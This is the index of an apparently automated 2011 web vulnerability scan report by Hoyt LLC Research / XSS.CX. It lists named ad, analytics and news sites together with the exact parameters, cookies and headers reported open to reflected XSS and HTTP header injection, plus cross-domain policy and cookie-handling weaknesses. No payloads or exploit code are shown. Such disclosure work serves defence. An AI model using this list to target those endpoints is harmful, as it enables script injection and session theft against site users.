XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 08:37:03 CDT 2011.

1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article [REST URL parameter 1]

1.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

2.10. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [b parameter]

2.11. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cid parameter]

2.12. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [count parameter]

2.13. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cpnmodule parameter]

2.14. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [e parameter]

2.15. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [epartner parameter]

2.16. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [event parameter]

2.17. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [h parameter]

2.18. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [l parameter]

2.19. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [nd parameter]

2.20. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [o parameter]

2.21. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [oepartner parameter]

2.22. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [orh parameter]

2.23. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [p parameter]

2.24. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pdom parameter]

2.25. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pg parameter]

2.26. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pid parameter]

2.27. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pp parameter]

2.28. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ppartner parameter]

2.29. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pt parameter]

2.30. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ra parameter]

2.31. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [rqid parameter]

2.32. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sg parameter]

2.33. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [site parameter]

2.34. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sz parameter]

2.35. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [t parameter]

2.36. http://ad.doubleclick.net/adj/pcw.main.blogs/bizfeed/index [blg parameter]

2.37. http://ad.doubleclick.net/adj/pcw.main.news/products/computers/laptops/article [blg parameter]

2.38. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.39. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.40. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

2.41. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

2.42. http://adserving2.cpxinteractive.com/st [ad_size parameter]

2.43. http://adserving2.cpxinteractive.com/st [ad_size parameter]

2.44. http://adserving2.cpxinteractive.com/st [section parameter]

2.45. http://adserving2.cpxinteractive.com/st [section parameter]

2.46. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxheight parameter]

2.47. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxwidth parameter]

2.48. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [mode parameter]

2.49. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxheight parameter]

2.50. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxwidth parameter]

2.51. http://api.freebase.com/api/trans/image_thumb/en/gadget [mode parameter]

2.52. http://api.freebase.com/api/trans/image_thumb/en/google [maxheight parameter]

2.53. http://api.freebase.com/api/trans/image_thumb/en/google [maxwidth parameter]

2.54. http://api.freebase.com/api/trans/image_thumb/en/google [mode parameter]

2.55. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxheight parameter]

2.56. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxwidth parameter]

2.57. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [mode parameter]

2.58. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxheight parameter]

2.59. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxwidth parameter]

2.60. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [mode parameter]

2.61. http://api.freebase.com/api/trans/image_thumb/en/skype [maxheight parameter]

2.62. http://api.freebase.com/api/trans/image_thumb/en/skype [maxwidth parameter]

2.63. http://api.freebase.com/api/trans/image_thumb/en/skype [mode parameter]

2.64. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxheight parameter]

2.65. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxwidth parameter]

2.66. http://api.freebase.com/api/trans/image_thumb/en/youtube [mode parameter]

2.67. http://apptap.scripps.com/apptap3 [app parameter]

2.68. http://apptap.scripps.com/apptap3 [app parameter]

2.69. http://apptap.scripps.com/apptap3 [path parameter]

2.70. http://apptap.scripps.com/apptap3 [site parameter]

2.71. http://apptap.scripps.com/apptap3 [site parameter]

2.72. http://apptap.scripps.com/apptap3 [title parameter]

2.73. http://apptap.scripps.com/apptap3 [title parameter]

2.74. http://apptap.scripps.com/apptap3 [topic parameter]

2.75. http://apptap.scripps.com/apptap3 [topic parameter]

2.76. http://ar.voicefive.com/b/rc.pli [func parameter]

2.77. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.78. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.79. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.80. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.81. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.82. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.83. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.84. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.85. http://button.topsy.com/widget/retweet-json [callback parameter]

2.86. http://button.topsy.com/widget/retweet-json [id parameter]

2.87. http://choices.truste.com/ca [c parameter]

2.88. http://choices.truste.com/ca [h parameter]

2.89. http://choices.truste.com/ca [iplc parameter]

2.90. http://choices.truste.com/ca [ox parameter]

2.91. http://choices.truste.com/ca [plc parameter]

2.92. http://choices.truste.com/ca [w parameter]

2.93. http://choices.truste.com/ca [zi parameter]

2.94. http://cm.npc-scripps.overture.com/js_1_0/ [css_url parameter]

2.95. http://guidepolls.about.com/urbanlegends/8140502316/poll.js [linkback parameter]

2.96. http://hits.nextstat.com/cgi-bin/wsv2.cgi [108645 parameter]

2.97. http://ib.adnxs.com/ptj [redir parameter]

2.98. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

2.99. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

2.100. http://js.revsci.net/gateway/gw.js [bpid parameter]

2.101. http://js.revsci.net/gateway/gw.js [csid parameter]

2.102. http://mads.com.com/mac-ad [&&&&&&adfile parameter]

2.103. http://mads.com.com/mac-ad [BRAND parameter]

2.104. http://mads.com.com/mac-ad [BRAND parameter]

2.105. http://mads.com.com/mac-ad [CELT parameter]

2.106. http://mads.com.com/mac-ad [SITE parameter]

2.107. http://mads.com.com/mac-ad [SITE parameter]

2.108. http://mads.com.com/mac-ad [_RGROUP parameter]

2.109. http://mads.zdnet.com/mac-ad [ADREQ&beacon parameter]

2.110. http://mads.zdnet.com/mac-ad [PAGESTATE parameter]

2.111. http://mads.zdnet.com/mac-ad [SITE parameter]

2.112. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

2.113. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.114. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.115. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

2.116. http://services.digg.com/1.0/endpoint [callback parameter]

2.117. http://services.digg.com/1.0/endpoint [method parameter]

2.118. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]

2.119. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [bullet parameter]

2.120. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [title parameter]

2.121. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [track parameter]

2.122. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [viewmore parameter]

2.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

2.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

2.125. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 1]

2.126. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 2]

2.127. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 3]

2.128. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 4]

2.129. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 5]

2.130. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]

2.131. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [REST URL parameter 4]

2.132. http://www.zdnet.com/favicon.ico [REST URL parameter 1]

2.133. http://z.about.com/6g/ip/284/27.htm [s parameter]

2.134. http://adserving2.cpxinteractive.com/st [Referer HTTP header]

2.135. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

2.136. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

2.137. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.138. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.139. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.140. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.141. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

2.142. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

2.143. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

2.144. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

2.145. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

2.146. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

2.152. http://hits.nextstat.com/scripts/wsb.php [webStat_108645 cookie]

2.153. http://seg.sharethis.com/getSegment.php [__stid cookie]

2.154. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

2.155. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

2.156. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm [jsc cookie]

3. Flash cross-domain policy

3.1. http://a.tribalfusion.com/crossdomain.xml

3.2. http://ad-emea.doubleclick.net/crossdomain.xml

3.3. http://ad.doubleclick.net/crossdomain.xml

3.4. http://ajax.googleapis.com/crossdomain.xml

3.5. http://altfarm.mediaplex.com/crossdomain.xml

3.6. http://ar.voicefive.com/crossdomain.xml

3.7. http://b.scorecardresearch.com/crossdomain.xml

3.8. http://b.voicefive.com/crossdomain.xml

3.9. http://bs.serving-sys.com/crossdomain.xml

3.10. http://cdn.eyewonder.com/crossdomain.xml

3.11. http://cdn.gigya.com/crossdomain.xml

3.12. http://core.insightexpressai.com/crossdomain.xml

3.13. http://ds.serving-sys.com/crossdomain.xml

3.14. http://feeds.delicious.com/crossdomain.xml

3.15. http://gscounters.gigya.com/crossdomain.xml

3.16. http://js.revsci.net/crossdomain.xml

3.17. http://mashable.com/crossdomain.xml

3.18. http://ping.crowdscience.com/crossdomain.xml

3.19. http://pix04.revsci.net/crossdomain.xml

3.20. http://pixel.quantserve.com/crossdomain.xml

3.21. http://s.gravatar.com/crossdomain.xml

3.22. http://static.crowdscience.com/crossdomain.xml

3.23. http://tags.bluekai.com/crossdomain.xml

3.24. http://tags.crwdcntrl.net/crossdomain.xml

3.25. http://www.pcworld.com/crossdomain.xml

3.26. http://adx.g.doubleclick.net/crossdomain.xml

3.27. http://googleads.g.doubleclick.net/crossdomain.xml

3.28. http://mads.com.com/crossdomain.xml

3.29. http://mads.zdnet.com/crossdomain.xml

3.30. http://network.alluremedia.com.au/crossdomain.xml

3.31. http://pubads.g.doubleclick.net/crossdomain.xml

3.32. http://services.digg.com/crossdomain.xml

3.33. http://static.ak.fbcdn.net/crossdomain.xml

3.34. http://tags.gawker.com/crossdomain.xml

3.35. http://www.facebook.com/crossdomain.xml

3.36. http://www.stumbleupon.com/crossdomain.xml

3.37. http://www.youtube.com/crossdomain.xml

3.38. http://www.zdnet.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

4.2. http://ad.doubleclick.net/clientaccesspolicy.xml

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.4. http://b.voicefive.com/clientaccesspolicy.xml

4.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://crenk.com/buy-chromebook/

5.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

5.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

5.4. http://www.pcworld.com/pcworldconnect/comment_registration

6. Session token in URL

6.1. http://l.sharethis.com/pview

6.2. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

6.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

6.4. http://www.facebook.com/extern/login_status.php

7. Password field submitted using GET method

8. Cookie scoped to parent domain

8.1. http://api.twitter.com/1/statuses/user_timeline.json

8.2. http://t.mookie1.com/t/v1/imp

8.3. http://www.imdb.com/title/tt0758746/

8.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

8.5. http://a.tribalfusion.com/displayAd.js

8.6. http://a.tribalfusion.com/j.ad

8.7. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

8.8. http://ads.adbrite.com/adserver/behavioral-data/8201

8.9. http://ads.adbrite.com/adserver/behavioral-data/8203

8.10. http://ads.pointroll.com/PortalServe/

8.11. http://ads.revsci.net/adserver/ako

8.12. http://ads.revsci.net/adserver/ako

8.13. http://adx.adnxs.com/mapuid

8.14. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

8.15. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

8.16. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

8.17. http://ar.voicefive.com/b/wc_beacon.pli

8.18. http://ar.voicefive.com/bmx3/broker.pli

8.19. http://ar.voicefive.com/bmx3/broker.pli

8.20. http://as.casalemedia.com/j

8.21. http://as.casalemedia.com/j

8.22. http://as.casalemedia.com/s

8.23. http://b.scorecardresearch.com/b

8.24. http://b.scorecardresearch.com/p

8.25. http://b.scorecardresearch.com/r

8.26. http://b.voicefive.com/b

8.27. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

8.28. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

8.29. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

8.30. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

8.31. http://bidder.mathtag.com/iframe/notify

8.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

8.33. http://bstats.adbrite.com/click/bstats.gif

8.34. http://cm.npc-gatehouse.overture.com/js_1_0/

8.35. http://cm.npc-scripps.overture.com/js_1_0/

8.36. http://core.insightexpressai.com/adServer/adServerESI.aspx

8.37. http://dw.zdnet.com/clear/c.gif

8.38. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623

8.39. http://hits.nextstat.com/cgi-bin/wsv2.cgi

8.40. http://hits.nextstat.com/scripts/wsb.php

8.41. http://ib.adnxs.com/ptj

8.42. http://ib.adnxs.com/seg

8.43. http://image2.pubmatic.com/AdServer/Pug

8.44. http://image3.pubmatic.com/AdServer/UPug

8.45. http://js.revsci.net/gateway/gw.js

8.46. http://load.exelator.com/load/

8.47. http://loadm.exelator.com/load/

8.48. http://loadus.exelator.com/load/

8.49. http://m.adnxs.com/msftcookiehandler

8.50. http://map.media6degrees.com/orbserv/hbpix

8.51. http://odb.outbrain.com/utils/get

8.52. http://odb.outbrain.com/utils/ping.html

8.53. http://p.brilig.com/contact/bct

8.54. http://pbid.pro-market.net/engine

8.55. http://pc2.yumenetworks.com/dynamic_btx/115_89795

8.56. http://ping.crowdscience.com/ping.js

8.57. http://pix04.revsci.net/D08734/a1/0/0/0.gif

8.58. http://pix04.revsci.net/D08734/a3/0/3/0.gif

8.59. http://pix04.revsci.net/G07610/b3/0/3/1003161/269685231.gif

8.60. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

8.61. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js

8.62. http://pixel.mathtag.com/data/img

8.63. http://pixel.quantserve.com/pixel

8.64. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

8.65. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

8.66. http://pixel.quantserve.com/seg/r

8.67. http://r.openx.net/set

8.68. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

8.69. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

8.70. http://rcm.amazon.com/e/cm

8.71. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.72. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

8.73. http://sync.mathtag.com/sync/img

8.74. http://t.invitemedia.com/track_imp

8.75. http://tags.bluekai.com/site/2989

8.76. http://tags.bluekai.com/site/3307

8.77. http://tags.bluekai.com/site/3319

8.78. http://tags.bluekai.com/site/450

8.79. http://uts.amazon.com/uts/IaR

8.80. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap

8.81. http://www.facebook.com/profile/pic.php

8.82. http://www.youtube.com/embed/TVqe8ieqz10

8.83. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

8.84. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

9. Cookie without HttpOnly flag set

9.1. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php

9.2. http://mysuburbanlife.mycapture.com/mycapture/scripts/remote.asp

9.3. http://t.mookie1.com/t/v1/imp

9.4. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap

9.5. http://www.imdb.com/title/tt0758746/

9.6. http://www.pcworld.com/articleComment/get.do

9.7. http://www.pcworld.com/articleVote/get.do

9.8. http://www.pcworld.com/pcworldconnect/a

9.9. http://www.pcworld.com/pcworldconnect/comment_registration

9.10. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

9.11. http://a.tribalfusion.com/displayAd.js

9.12. http://a.tribalfusion.com/j.ad

9.13. http://a1.interclick.com/getInPageJSProcess.aspx

9.14. http://a1.interclick.com/getInPageJSProcess.aspx

9.15. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

9.16. http://ad.yieldmanager.com/imp

9.17. http://ad.yieldmanager.com/pixel

9.18. http://ads.adbrite.com/adserver/behavioral-data/8201

9.19. http://ads.adbrite.com/adserver/behavioral-data/8203

9.20. http://ads.cpxadroit.com/adserver/10-3QKLX5UTS2G94.cpxad

9.21. http://ads.pointroll.com/PortalServe/

9.22. http://ads.revsci.net/adserver/ako

9.23. http://ads.revsci.net/adserver/ako

9.24. http://ads.undertone.com/aj

9.25. http://ads.undertone.com/fc.php

9.26. http://ads.undertone.com/l

9.27. http://ads.undertone.com/l

9.28. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

9.29. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

9.30. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

9.31. http://apex.com.com/aws/rest/v1.0/offerScript

9.32. http://api.twitter.com/1/statuses/user_timeline.json

9.33. http://ar.voicefive.com/b/wc_beacon.pli

9.34. http://ar.voicefive.com/bmx3/broker.pli

9.35. http://ar.voicefive.com/bmx3/broker.pli

9.36. http://as.casalemedia.com/j

9.37. http://as.casalemedia.com/j

9.38. http://as.casalemedia.com/s

9.39. http://b.scorecardresearch.com/b

9.40. http://b.scorecardresearch.com/p

9.41. http://b.scorecardresearch.com/r

9.42. http://b.voicefive.com/b

9.43. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

9.44. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

9.45. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

9.46. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

9.47. http://bidder.mathtag.com/iframe/notify

9.48. http://bpx.a9.com/ads/getad

9.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.50. http://bstats.adbrite.com/click/bstats.gif

9.51. http://cm.npc-gatehouse.overture.com/js_1_0/

9.52. http://cm.npc-scripps.overture.com/js_1_0/

9.53. http://core.insightexpressai.com/adServer/adServerESI.aspx

9.54. http://crenk.com/buy-chromebook/

9.55. http://csc.beap.ad.yieldmanager.net/i

9.56. http://dw.zdnet.com/clear/c.gif

9.57. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623

9.58. http://hits.nextstat.com/cgi-bin/wsv2.cgi

9.59. http://hits.nextstat.com/scripts/wsb.php

9.60. http://image2.pubmatic.com/AdServer/Pug

9.61. http://image3.pubmatic.com/AdServer/UPug

9.62. http://js.revsci.net/gateway/gw.js

9.63. http://load.exelator.com/load/

9.64. http://loadm.exelator.com/load/

9.65. http://loadus.exelator.com/load/

9.66. http://map.media6degrees.com/orbserv/hbpix

9.67. http://network.alluremedia.com.au/network/www/delivery/afr.php

9.68. http://network.alluremedia.com.au/network/www/delivery/ajs.php

9.69. http://network.alluremedia.com.au/network/www/delivery/lg.php

9.70. http://odb.outbrain.com/utils/get

9.71. http://odb.outbrain.com/utils/ping.html

9.72. http://open.ad.yieldmanager.net/a1

9.73. http://p.brilig.com/contact/bct

9.74. http://pbid.pro-market.net/engine

9.75. http://pc2.yumenetworks.com/dynamic_btx/115_89795

9.76. http://ping.crowdscience.com/ping.js

9.77. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.78. http://pix04.revsci.net/D08734/a3/0/3/0.gif

9.79. http://pix04.revsci.net/G07610/b3/0/3/1003161/269685231.gif

9.80. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

9.81. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js

9.82. http://pixel.mathtag.com/data/img

9.83. http://pixel.quantserve.com/pixel

9.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

9.85. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

9.86. http://pixel.quantserve.com/seg/r

9.87. http://r.openx.net/set

9.88. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

9.89. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

9.90. http://rcm.amazon.com/e/cm

9.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet

9.92. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

9.93. http://statse.webtrendslive.com/dcshk2h3ouz5bdzhx6ilj0lvi_2m1v/dcs.gif

9.94. http://sync.mathtag.com/sync/img

9.95. http://t.invitemedia.com/track_imp

9.96. http://tags.bluekai.com/site/2989

9.97. http://tags.bluekai.com/site/3307

9.98. http://tags.bluekai.com/site/3319

9.99. http://tags.bluekai.com/site/450

9.100. http://tenzing.fmpub.net/

9.101. http://uts.amazon.com/uts/IaR

9.102. http://warnerbros.112.2o7.net/b/ss/wbrostheatricaldomesticdvd/1/H.15.1/s23239967282861

9.103. http://www.blogged.com/icons/vn_reganl_8165.gif

9.104. http://www.etracker.de/cnt.php

9.105. http://www.facebook.com/profile/pic.php

9.106. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

9.107. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

9.108. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

9.109. http://www.youtube.com/embed/TVqe8ieqz10

9.110. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

9.111. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

10. Password field with autocomplete enabled

10.1. http://crenk.com/buy-chromebook/

10.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

10.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

10.4. http://www.pcworld.com/pcworldconnect/comment_registration

11. Referer-dependent response

11.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.2. http://ad.yieldmanager.com/imp

11.3. http://ads.adbrite.com/adserver/behavioral-data/8201

11.4. http://ads.adbrite.com/adserver/behavioral-data/8203

11.5. http://adserving2.cpxinteractive.com/st

11.6. http://api.twitter.com/1/statuses/user_timeline.json

11.7. http://bstats.adbrite.com/click/bstats.gif

11.8. http://csi.gstatic.com/csi

11.9. http://mads.com.com/mac-ad

11.10. http://network.alluremedia.com.au/network/www/delivery/afr.php

11.11. http://vimeo.com/moogaloop.swf

11.12. http://www.facebook.com/plugins/activity.php

11.13. http://www.facebook.com/plugins/like.php

11.14. http://www.facebook.com/plugins/likebox.php

